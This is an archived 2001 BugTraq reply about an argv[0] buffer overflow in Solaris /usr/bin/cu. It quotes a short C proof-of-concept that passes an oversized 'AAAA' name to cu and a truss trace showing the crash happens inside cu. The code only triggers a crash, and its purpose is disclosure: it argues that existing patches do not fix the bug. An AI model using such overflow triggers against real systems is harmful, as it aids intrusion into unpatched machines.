Re: Solaris /usr/bin/cu Vulnerability
daemon@ATHENA.MIT.EDU (Dan Harkless)
Wed Jan 31 12:24:58 2001
Message-ID: <200101310518.VAA21556@dilvish.speed.net>
Date: Tue, 30 Jan 2001 21:18:32 -0800
Reply-To: Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET>
From: Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: Message from optyx <optyx@UBERHAX0R.NET> of "Tue, 30 Jan 2001
12:01:10 PST."
<Pine.BSO.4.21.0101301154430.6496-100000@pr0n.newhackcity.net>
optyx <optyx@UBERHAX0R.NET> writes:
> Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET> wrote:
> >Are you implying the above patches fix the cu long hardlink name
> >vulnerability? This is not the case, at least on 2.6:
> >
> > # cat > cu_exploit.c
> > #include <stdio.h>
> >
> > void main(int argc,char **argv)
> > {
> > char *buf;
> >
> > buf = (char *) malloc(atoi(argv[1])*sizeof(char));
> > memset(buf,0x41,atoi(argv[1])-1);
> > buf[atoi(argv[1])-1]=0;
> > execl("/usr/bin/cu",buf,(char *)0);
> > }
> > # gcc cu_exploit.c
> > cu_exploit.c: In function `main':
> > cu_exploit.c:4: warning: return type of `main' is not `int'
> > # a.out
> > Segmentation fault
>
> see that atoi(argv[1])? a.out crashed, not /usr/bin/cu. try a.out 4000 or
> whatever number next time, or trace through it with gdb.
Right, sorry. I had the 4000 (actually 40000 -- it didn't crash with only
4000) in there when I ran it originally, but forgot to include it in my
proof-of-concept session. Here's the correct version (the ellipsis in the
Usage line and the \-line-wrapping are mine):
# a.out 4000
Usage: AAA[...]AAA [-dhtnLC] [-c device] [-s speed] [-l line] [-b 7|8]
[-o | -e] telno | systemname [local-cmd]
# a.out 40000
Segmentation Fault
# truss a.out 40000
execve("./a.out", 0xEFFFFC98, 0xEFFFFCA4) argc = 2
open("/dev/zero", O_RDONLY) = 3
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\
0) = 0xEF7B0000
stat("a.out", 0xEFFFF998) = 0
open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT
open("/usr/local/lib/libc.so.1", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libc.so.1", O_RDONLY) = 4
fstat(4, 0xEFFFF734) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF7A0000
mmap(0x00000000, 704512, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF6C0000
mmap(0xEF763000, 25888, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 4, 602112) = 0xEF763000
mmap(0xEF76A000, 4144, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF76A000
munmap(0xEF754000, 61440) = 0
memcntl(0xEF6C0000, 101660, MC_ADVISE, 0x0003, 0, 0) = 0
close(4) = 0
open("/usr/local/lib/libdl.so.1", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libdl.so.1", O_RDONLY) = 4
fstat(4, 0xEFFFF734) = 0
mmap(0xEF7A0000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\
= 0xEF7A0000
close(4) = 0
open("/usr/platform/SUNW,SPARCstation-5/lib/libc_psr.so.1", O_RDONLY)\
Err#2 ENOENT
close(3) = 0
brk(0x00020BA0) = 0
brk(0x0002ABA0) = 0
execve("/usr/bin/cu", 0xEFFFFBB8, 0xEFFFFCB0) argc = 1
open("/dev/zero", O_RDONLY) = 3
mmap(0x00000000, 40960, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\
0) = 0xEF7B0000
stat("/usr/bin/cu", 0xEFFF5D60) = 0
open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\
0) = 0xEF7A0000
open("/usr/local/lib/libnsl.so.1", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libnsl.so.1", O_RDONLY) = 4
fstat(4, 0xEFFF5AFC) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF790000
mmap(0x00000000, 581632, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF700000
mmap(0xEF780000, 32812, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 4, 458752) = 0xEF780000
mmap(0xEF789000, 19976, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF789000
munmap(0xEF771000, 61440) = 0
memcntl(0xEF700000, 70140, MC_ADVISE, 0x0003, 0, 0) = 0
close(4) = 0
open("/usr/local/lib/libsocket.so.1", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libsocket.so.1", O_RDONLY) = 4
fstat(4, 0xEFFF5AFC) = 0
mmap(0xEF790000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\
= 0xEF790000
mmap(0x00000000, 102400, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF6E0000
mmap(0xEF6F7000, 4089, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 4, 28672) = 0xEF6F7000
mmap(0xEF6F8000, 388, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF6F8000
munmap(0xEF6E8000, 61440) = 0
memcntl(0xEF6E0000, 12072, MC_ADVISE, 0x0003, 0, 0) = 0
close(4) = 0
open("/usr/local/lib/libc.so.1", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libc.so.1", O_RDONLY) = 4
fstat(4, 0xEFFF5AFC) = 0
mmap(0xEF790000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\
= 0xEF790000
mmap(0x00000000, 704512, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF600000
mmap(0xEF6A3000, 25888, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 4, 602112) = 0xEF6A3000
mmap(0xEF6AA000, 4144, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF6AA000
munmap(0xEF694000, 61440) = 0
memcntl(0xEF600000, 101660, MC_ADVISE, 0x0003, 0, 0) = 0
close(4) = 0
open("/usr/local/lib/libdl.so.1", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libdl.so.1", O_RDONLY) = 4
fstat(4, 0xEFFF5AFC) = 0
mmap(0xEF790000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\
= 0xEF790000
close(4) = 0
open("/usr/local/lib/libmp.so.2", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libmp.so.2", O_RDONLY) = 4
fstat(4, 0xEFFF5AFC) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xEF6D0000
mmap(0x00000000, 77824, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF5E0000
mmap(0xEF5F2000, 3581, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 4, 8192) = 0xEF5F2000
munmap(0xEF5E3000, 61440) = 0
memcntl(0xEF5E0000, 3020, MC_ADVISE, 0x0003, 0, 0) = 0
close(4) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\
0) = 0xEF6C0000
open("/usr/platform/SUNW,SPARCstation-5/lib/libc_psr.so.1", O_RDONLY)\
Err#2 ENOENT
close(3) = 0
munmap(0xEF6D0000, 4096) = 0
Incurred fault #6, FLTBOUNDS %pc = 0xEF624694
siginfo: SIGSEGV SEGV_MAPERR addr=0x00038000
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x00038000
*** process killed ***
As you can see, by the time of the segmentation fault execve() has already
passed control to /usr/bin/cu: the second execve() in the trace is of
/usr/bin/cu (argc = 1, i.e. only the oversized argv[0]), and the FLTBOUNDS /
SIGSEGV is raised after that point, in cu's own address space rather than in
a.out.
----------------------------------------------------------------------
Dan Harkless | To prevent SPAM contamination, please
dan-bugtraq@dilvish.speed.net | do not mention this private email
SpeedGate Communications, Inc. | address in Usenet posts. Thank you.